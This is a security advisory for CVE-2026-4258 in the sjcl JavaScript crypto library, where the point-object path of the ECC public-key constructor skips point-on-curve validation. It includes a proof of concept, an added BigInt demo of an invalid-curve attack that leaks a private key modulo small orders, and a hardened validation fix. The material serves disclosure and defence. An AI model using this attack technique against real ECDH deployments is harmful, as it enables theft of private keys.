Improper Verification of Cryptographic Signature Affecting sjcl package, versions *


Severity: High

CVSS assessment by Snyk's Security Team.

Threat Intelligence

Exploit Maturity: Proof of Concept

  • Snyk ID: SNYK-JS-SJCL-15369617
  • Published: 16 Mar 2026
  • Disclosed: 17 Feb 2026
  • Credit: Kr0emer

Introduced: 17 Feb 2026

CVE-2026-4258
CWE-347
First added by Snyk

How to fix?

A fix was pushed into the master branch but not yet published. Until a release containing it is available, code that accepts a peer public key as a point object should check point.isValid() before using it, or pass the key through the bitArray form, which sjcl already validates on the way in.

Overview

sjcl is the Stanford Javascript Crypto Library.

Affected versions of this package are vulnerable to Improper Verification of Cryptographic Signature due to missing point-on-curve validation in sjcl.ecc.basicKey.publicKey(). When the public key is supplied as a point object rather than as a bitArray, the constructor stores the point without calling isValid(), so a point that does not satisfy the curve equation (for secp256k1, y² = x³ + 7 mod p) is accepted as a peer key. This enables an invalid-curve attack: because the addition formulas do not involve the curve coefficient b, an attacker can send crafted off-curve public keys that lie on other curves with small-order points, and each ECDH output then reveals the victim's private scalar modulo that small order; combining the residues recovers the victim's ECDH private key. The dhJavaEc() function directly returns the raw x-coordinate of the scalar multiplication result (no hashing or key derivation), so the ECDH outputs themselves act as a plaintext oracle without requiring any decryption feedback from the victim.

PoC

// Requires an sjcl build that includes the bn/ecc modules; the default build
// published to npm omits them (see ./configure --with-ecc in the sjcl repository).
const sjcl = require('sjcl');

const curve = sjcl.ecc.curves.k256;

// Point NOT on secp256k1 (y² ≠ x³ + 7 mod p). Coordinates are built as field
// elements so that toBits() yields the full 2×256-bit encoding fromBits() expects.
const offCurve = new sjcl.ecc.point(curve, new curve.field(5), new curve.field(1));
console.log('isValid:', offCurve.isValid());  // false

// bitArray path: basicKey.publicKey() calls curve.fromBits(), which checks
// isValid() and throws sjcl.exception.corrupt -> REJECTS (correct)
try {
  new sjcl.ecc.elGamal.publicKey(curve, offCurve.toBits());
  console.log('bitArray: accepted');
} catch (e) {
  console.log('bitArray: rejected ✓', e.message);
}

// point object path: the point is stored as-is, isValid() is never called -> ACCEPTS (bug)
try {
  new sjcl.ecc.elGamal.publicKey(curve, offCurve);
  console.log('pointObj: accepted ← BUG');
} catch (e) {
  console.log('pointObj: rejected');
}
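The PoC above only shows that an off-curve point is accepted. The following is an added example, written for this page and not code from sjcl or from the advisory's author, that shows why that matters and what the fix looks like. It implements secp256k1 point arithmetic over BigInt (the domain parameters are the real SEC 2 constants; everything else is assumed for the demo), an unvalidated "raw x-coordinate" ECDH in the style the Overview attributes to dhJavaEc(), and the hardened form that validates the peer key first. It goes beyond the page in one respect: it walks the attack through two attacker-chosen small-order points, (5, 0) of order 2 and (3, 9/2) of order 3, to show the private key leaking modulo those orders; the victim key SECRET_D and the choice of points are constructed for the demo.

```javascript
'use strict';

// Added example (not sjcl's code): minimal secp256k1 arithmetic over BigInt.
// Parse the SEC 2 constants from their usual 8-digit groups.
const hex = (s) => BigInt('0x' + s.replace(/\s+/g, ''));
const P = hex('FFFFFFFF FFFFFFFF FFFFFFFF FFFFFFFF FFFFFFFF FFFFFFFF FFFFFFFE FFFFFC2F');
const N = hex('FFFFFFFF FFFFFFFF FFFFFFFF FFFFFFFE BAAEDCE6 AF48A03B BFD25E8C D0364141');
const B = 7n;
const G = {
  x: hex('79BE667E F9DCBBAC 55A06295 CE870B07 029BFCDB 2DCE28D9 59F2815B 16F81798'),
  y: hex('483ADA77 26A3C465 5DA4FBFC 0E1108A8 FD17B448 A6855419 9C47D08F FB10D4B8'),
};

const mod = (a) => ((a % P) + P) % P;

function modPow(base, exp) {
  let result = 1n;
  base = mod(base);
  while (exp > 0n) {
    if (exp & 1n) result = mod(result * base);
    base = mod(base * base);
    exp >>= 1n;
  }
  return result;
}

// Fermat inverse; P is prime and callers never pass 0.
const modInv = (a) => modPow(a, P - 2n);

// Affine addition for y^2 = x^3 + a*x + b with a = 0. The coefficient b never
// appears, so the same formulas "work" on every curve y^2 = x^3 + b', which is
// exactly what an invalid-curve attack exploits. null is the point at infinity.
function pointAdd(p1, p2) {
  if (p1 === null) return p2;
  if (p2 === null) return p1;
  let lambda;
  if (p1.x === p2.x) {
    if (mod(p1.y + p2.y) === 0n) return null; // Q + (-Q); also doubling a point with y = 0
    lambda = mod(3n * p1.x * p1.x * modInv(2n * p1.y));
  } else {
    lambda = mod((p2.y - p1.y) * modInv(p2.x - p1.x));
  }
  const x3 = mod(lambda * lambda - p1.x - p2.x);
  const y3 = mod(lambda * (p1.x - x3) - p1.y);
  return { x: x3, y: y3 };
}

// Right-to-left double-and-add (not constant time; illustration only).
function scalarMult(k, point) {
  let result = null;
  let addend = point;
  while (k > 0n) {
    if (k & 1n) result = pointAdd(result, addend);
    addend = pointAdd(addend, addend);
    k >>= 1n;
  }
  return result;
}

// Vulnerable pattern, mirroring what the Overview says dhJavaEc() does: the raw
// x-coordinate of [d]Q is returned with no check on Q. null stands for infinity.
function rawEcdh(d, peerPoint) {
  const shared = scalarMult(d, peerPoint);
  return shared === null ? null : shared.x;
}

function isOnCurve(pt) {
  if (pt === null) return false;
  if (pt.x < 0n || pt.x >= P || pt.y < 0n || pt.y >= P) return false;
  return mod(pt.y * pt.y) === mod(pt.x * pt.x * pt.x + B);
}

// Hardened form: an isValid()-style check applied to every peer key. secp256k1
// has cofactor 1, so an on-curve finite point is already in the prime-order
// group; the [N]Q test is kept as cheap insurance when porting to other curves.
function safeEcdh(d, peerPoint) {
  if (!isOnCurve(peerPoint)) throw new Error('public key is not on the curve');
  if (scalarMult(N, peerPoint) !== null) throw new Error('public key has wrong order');
  return rawEcdh(d, peerPoint);
}

// Attacker-chosen points of small order on curves y^2 = x^3 + b' (b' != 7).
// (5, 0) has order 2 on y^2 = x^3 - 125: doubling divides by 2y = 0.
const ORDER2 = { x: 5n, y: 0n };
// (3, 9/2) has order 3 on y^2 = x^3 - 27/4: requiring x([2]Q) = x(Q) in the
// doubling formula gives 3x^3 = 4y^2, and x = 3 makes y = 9/2 mod p.
const ORDER3 = { x: 3n, y: mod(9n * modInv(2n)) };

// Attacker side: given the observed output for a point of the given order, keep
// every k < order that reproduces it. x([k]Q) = x([order-k]Q), so this yields
// d mod order up to sign; residues from many small orders are combined with
// the CRT to rebuild d.
function recoverResidue(observedX, point, order) {
  const candidates = [];
  for (let k = 0n; k < order; k++) {
    const r = scalarMult(k, point);
    if ((r === null ? null : r.x) === observedX) candidates.push(k);
  }
  return candidates;
}

const SECRET_D = 1234567891013n; // constructed victim private key for the demo

function demo() {
  const res2 = recoverResidue(rawEcdh(SECRET_D, ORDER2), ORDER2, 2n);
  const res3 = recoverResidue(rawEcdh(SECRET_D, ORDER3), ORDER3, 3n);
  let hardened;
  try { safeEcdh(SECRET_D, ORDER2); hardened = 'accepted'; } catch (e) { hardened = e.message; }
  return { res2, res3, hardened };
}

const out = demo();
console.log('d mod 2 candidates:', out.res2.map(String), 'actual:', String(SECRET_D % 2n));
console.log('d mod 3 candidates:', out.res3.map(String), 'actual:', String(SECRET_D % 3n));
console.log('hardened ECDH on the order-2 point:', out.hardened);
```

Two design points carry over to sjcl. First, the check must run on every input path: sjcl's fromBits() already rejects off-curve points, and the bug is only that the point-object path skips the same test, so the fix is to apply isValid() (plus an infinity check) regardless of how the key arrived. Second, an unvalidated peer key is dangerous precisely because the group law never looks at b; returning the raw x-coordinate, as the Overview describes for dhJavaEc(), simply makes the leak directly observable rather than creating it.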
